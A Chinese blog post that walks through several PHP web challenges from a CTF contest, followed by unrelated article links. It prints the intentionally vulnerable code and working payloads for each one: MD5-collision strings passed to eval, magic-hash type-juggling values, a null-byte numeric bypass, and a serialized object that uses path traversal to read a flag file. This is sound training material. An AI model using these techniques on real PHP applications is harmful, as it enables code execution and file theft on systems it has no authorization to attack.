记一次CTF赛web题

已于 2024-09-11 19:45:48 修改
阅读量300 收藏
点赞数 3
文章标签: 前端 android java
于 2024-09-11 15:09:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shao65308/article/details/142140394
版权

windows环境下部署代码

WEB1:

<?php 
error_reporting(0); 

if(isset($_GET['x'])&&isset($_GET['y']) && strpos($_GET['x'], 'system("type flag1.php");')  !== false && strpos($_GET['y'], 'system("type flag1.php");') !== false){ 
    $x=$_GET['x']; 
    $y=$_GET['y']; 

if((string)$x!=(string)$y&&md5($x)===md5($y)){ 
    eval($x.$y); 
}else{ 
    die("---------------------------flag在当前目录下的flag1.php文件中-----------------------------------"); 
} 
}else{ 
highlight_file(__FILE__); 
}

使用md5碰撞产生相等的值。
这里使用了工具fastcoll。下载的地址:https://github.com/iamjazz/Md5collision

1.首先新建1.txt文档,内容:system("type flag1.php");?>//
2.然后执行 fastcoll_v1.0.0.5.exe -p init.txt -o 1.txt 2.txt

此时会在目录下生成1.txt和2.txt。
接着命令窗口运行 php Md5collision.php 会生成两段url编码

x和y分别传值就可以了

x=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%01%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%0FA%FC%D94%B7nS%A0%14.%0Fb%E4cjl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1AU%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%94%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%27Ry%1B%F0&y=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%81%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%8FA%FC%D94%B7nS%A0%14.%0Fb%E4%E3jl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1A%D5%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%14%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%A7Ry%1B%F0

WEB5:

<?php
highlight_file('5blfg.php');
include('f' . 'lag5' . '.php');
$var = "y" . "cfl" . "ag";
$$var = str_replace('N', 'Z', 'Not the reaN flag');

$content = trim(@file_get_contents('fl' . 'a' . 'g5' . '.php'));
extract($_GET);

if (isset($$var)) {
    if ($$var != $content && md5($$var) == md5($content)) {
        echo "</br>";
        echo "$flag";
    } else {
        echo "</br>";
        echo 'please ' . 'refuel';
    }
}
?>

$$var=$ycflag,$content经过extract($_GET);后也会变量覆盖

传变量值ycflag,content,使md5弱等于就行

?ycflag=QNKCDZO&content=TUFEPMC

WEB4:

<?php
highlight_file('4kbzf.php');
include('f' . 'lag4' . '.php');
$info = "";
$req = [];
$flag = trim(@file_get_contents('fl' . 'a' . 'g4' . '.php'));

ini_set("display_error", false);
error_reporting(0);

if(!isset($_GET['number'])){
    header("hint:" . hash("md5", "2djwioadopkwapodkpawkpdw.txt"));

    die("please refuel!!");
}

foreach([$_GET, $_POST] as $global_var) {
    foreach($global_var as $key => $value) {
        $value = trim($value);
        if(is_string($value)){
            $req[$key] = addslashes($value);
        }
    }
}

function is_hwhs_number($number) {
    $number = strval($number);
    $i = 0;
    $j = strlen($number) - 1;
    while($i < $j) {
        if($number[$i] !== $number[$j]) {
            return false;
        }
        $i++;
        $j--;
    }
    return true;
}

if(is_numeric($_REQUEST['number'])) {
    $info="抱歉您输入的是数字";
}
elseif($req['number']!=strval(intval($req['number']))) {
    $info = "数字必须等于其整数!!";
}
else {
    $value1 = intval($req["number"]);
    $value2 = intval(strrev($req["number"]));
    if($value1!=$value2=323){
        $info="这不是回文数字!!";
    }
    else {
        if(is_hwhs_number($req["number"])){
            $info = "{$value1} 是一个回文数字!";
        }
        else {
            var_dump($flag);
        }
    }
}
?>

is_numeric()、intval()函数检查传入的number变量是否是数字,is_numeric()使用%00绕过,放在开头绕过,但是经我测试,放在结尾也行

%00是绕过is_numeric(),323是回文数,%0c是\f,%2b是+,加入\f和+是为了在判断$req['number']!=strval(intval($req['number']))之后绕过is_hwhs_number()

传值:?number=%00%2b323

参考文章:关于PHP一些漏洞的姿势_末初的技术博客_51CTO博客

WEB6:

<?php
// ini_set("display_errors", 0);
// error_reporting(0);
class Yangqidasai
{
    protected $string1;
    protected $string2;
    function __destruct()
    {
        if(($this->string1 != $this->string2) && (md5($this->string1) === md5($this->string2)))
        {
            $filename = "C:\\web\\www\\html\\".$this->string1;
            $filename = substr($filename, 0, 47);
            $char_arr = array_count_values(str_split($filename));
            arsort($char_arr);
            $char_arr = array_keys($char_arr);
            do 
            {
                $char = array_shift($char_arr);
            }
            while($char == "t");
            $filename = $filename.$char;
            $newfilename1 = str_replace("../", "..\\", $filename);
            echo '<hr>';
            $newString = substr($newfilename1, 0, strlen($newfilename1) - 7);      
            echo file_get_contents($newString);
        }
    }
}
highlight_file(__FILE__);
echo 'flag in c:\\flag';
unserialize($_REQUEST['xyctf']);

?>

1、分析代码,string1要传递的值应该为

../../../../../../../flagaaaaaa

经过代码对string1的值进行截取、替换和拼接一系列操作,$newString最终的值为 :C:\web\www\html\..\..\..\..\..\..\..\flag

file_get_contents才能以目录穿越的方式读到c:\flag文件

2、以web1的方式绕过md5强等

新建 一个文件内容为“../../../../../../../flagaaaaaa”的x.txt文件

执行 fastcoll_v1.0.0.5.exe -p x.txt -o 1.txt 2.txt

php Md5collision.php 生成两段md3强等的字符作为stirng1和string2的值

3、生成反序列化字符

<?php
class Yangqidasai
{
    protected $string1;
    protected $string2;
    function __construct() {
        $this->string1 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9');
        $this->string2 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9');
    }
}

$b=new Yangqidasai;
echo urlencode(serialize($b)); 
?>

?xyctf=O%3A11%3A%22Yangqidasai%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00string1%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9%22%3Bs%3A10%3A%22%00%2A%00string2%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9%22%3B%7D

shao65308
关注
一次举办CTF
sjtu_jzh的博客
08-30 2218
本次CTF所使用的平台是Facebook发布的开源CTF平台FBCTF。用户通过浏览器访问FBCTF平台,FBCTF平台支持用户注册、目装载、积分统计、发布公告等基本功能,配置了优秀的UI和易用的后台;平台也具有高度的可拓展性,用户可以根据自己的需求去自定义游戏流程、规则、代码等等;平台支持数据的导入和导出;平台配置过程简易,并且配备了完整的用户社区,用户可以在社区中和开发者进行有效的互动。...
CTF一次CTF的Writeup(附目下载地址)
TeamsSix 的 CSDN 空间
09-25 3471
0x00 前言 最近因为省快来了,因此为实验室的小伙伴准备了这次比,总共10道目,考虑到大多数小伙伴都刚从大一升到大二,因此整体难度不高,当然有几道难度还是有的。 目大多数都是从网上东找西找的,毕竟我也是个菜鸟呀,还要给他们出,我太难了。 废话不多说,直接上Writeup吧,以下目的文件下载地址可以在我的公众号(TeamsSix)回复CTF获取。 0x01 隐写 1 flag:steg...
一次CTFWEB(入门级别)
热门推荐
CTF小白的博客
04-14 2万+
目录签到一签到二口算小天才easy php录取查询我爱pythonSpring 这次院目比较基础,适合给刚入门CTF的小白提供一个大致CTF思路。(主要因为本人小白,表示能学到不少东西。) 签到一 目中直接给了flag,提交就可以了。 签到二 这主要考察的是基本的F12能力,查看网页源码,以及修改input输入框的长度。 口算小天才 这通过意,是需要让我们在1~3秒内回答...
CTFweb库笔(难度1)
cocoaiu的博客
08-11 8264
CTF
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
CTF | CTF解分享
hackzkaq的博客
10-09 7742
前言:由于此次比目较多,所以这是这个比的第一篇wp,共20,先录一下,防止忘。里面有些目是新手较为简单,但也有许多有意思的目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
【NSSCTF】刷录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2904
此处主要在NSSCTF平台()上开展刷
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1415
CTF简介以及信息泄露下目解过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞模式 2.1.理论知识 2.2.Jeopardy-解 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比形式 3.1.线上 3.2.线下 4.目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
前端用html写excel文件直接打开
全易
09-10 673
html文件直接用excel打开
[项目][WebServer][日志设计]详细讲解
SnowK博客
09-11 4437
[项目][WebServer][日志设计]详细讲解
​美​团​一​面​
最新发布
qq_43858368的博客
09-14 1423
同步代码:按照代码的书写顺序立即执行。异步代码:通过关键字,异步操作会被放入微任务队列中等待执行。事件循环:在同步代码执行完毕后,事件循环会检查并执行微任务队列中的任务。async2script endasync1 end这个顺序反映了JavaScript中同步与异步代码的执行机制以及事件循环的工作原理。定义:HEAD请求是一种HTTP方法,它请求服务器返回与GET请求相同的响应头部,但不返回响应的主体部分。用途:主要用于获取资源的元信息,如文件大小、最后修改时间等,而无需下载整个资源。定义。
前端HTML+CSS+JS的入门学习
m0_59247951的博客
09-10 1499
和</p>,其中<p>是开始标签,表示一个段落的开始,而
经验笔Web 浏览器存储手段
qq_45831414的博客
09-10 882
以上就是使用 IndexedDB 的基本步骤。IndexedDB 提供了强大的数据存储能力,并且可以通过索引来优化数据检索性能。在实际应用中,可能还需要处理更复杂的场景,比如数据迁移、错误处理等。务必确保你的代码能够妥善处理各种异常情况。
水平居中的几种方法(总结)
致未来的你。的博客
09-11 846
水平居中的几种方法(总结)
前端项目node版本问导致依赖安装异常的处理办法
weixin_44703272的博客
09-14 277
解决前端项目中的Node版本问通常涉及以下步骤:检查项目文档:查看项目是否有特定的Node版本要求,如果有,确保你的Node版本与之兼容。使用Node版本管理器:如nvm(Node Version Manager)或n。它们可以让你在同一台机器上安装和切换不同版本的Node。
JS笔
2201_76100326的博客
09-11 520
Math对象属于Javascript内置对象,无需实例化(不需要添加new ),可以直接使用。只有一个Math.PI的属性。
WebGL系列教程六(纹理映射与立方体贴图)
AIGIS的博客
09-12 1246
上一讲我们讲了如何使用索引绘制彩色立方体,还留了一个思考:怎么让立方体的每个面都保持一个颜色?这一讲我们就来解决这个问,并引出纹理映射和立方体贴图。其实这个词语还是比较好理解。见名知意,大概意思就是把纹理映射到某个地方,纹理是什么?现在你可以简单的认为纹理就是一张图片。把一张二维的图片映射到一个三维物体的表面,就叫纹理映射。本节我们从如何将立方体每个面的颜色改为相同的颜色开始,介绍到了如何将图片贴到立方体的表面,系统的分析了为什么不能再共用顶点,并将代码进行了修改,以及讲解了纹理坐标的使用。
Vue3中slot插槽的几种使用实践
小小默:进无止境
09-14 497
父组件子组件父组件中Category 组件标签内的东西将会呈现在子组件slot的位置(进行替换)。
ctf理论
07-27
CTF理论库是一个包含一系列理论问库,用于帮助参与者通过回答问来测试和提高他们的理论知识和技能。这些问通常涵盖计算机和网络安全领域的各个方面,例如密码学、漏洞利用、网络协议等。 CTF理论库的目的是让参与者在实际的CTF中更好地理解和解决问。它们可以帮助参与者加深对某些概念和原理的理解,并帮助他们思考和分析问的能力。对于那些希望在CTF中取得好成绩的人来说,掌握这些理论知识非常重要。 这些库中的问通常是多选、单选或填空的形式。参与者需要根据自己的知识和经验选择正确的答案或填写正确的答案。有些目可能需要参与者进行计算或进行推断,以便找到正确的答案。 CTF理论库不仅对于参与者来说是一个学习工具,也是一个评估工具。参与者可以通过回答这些问来自我评估和调整自己的学习进度和知识水平。同时,CTF组织者也可以使用这些库作为选拔和评分工具,来确定参与者的能力和成绩。 总之,CTF理论库是一个重要的学习和评估工具,它帮助参与者测试和提高他们的理论知识和技能,同时也给比组织者提供一种评估参与者能力的手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值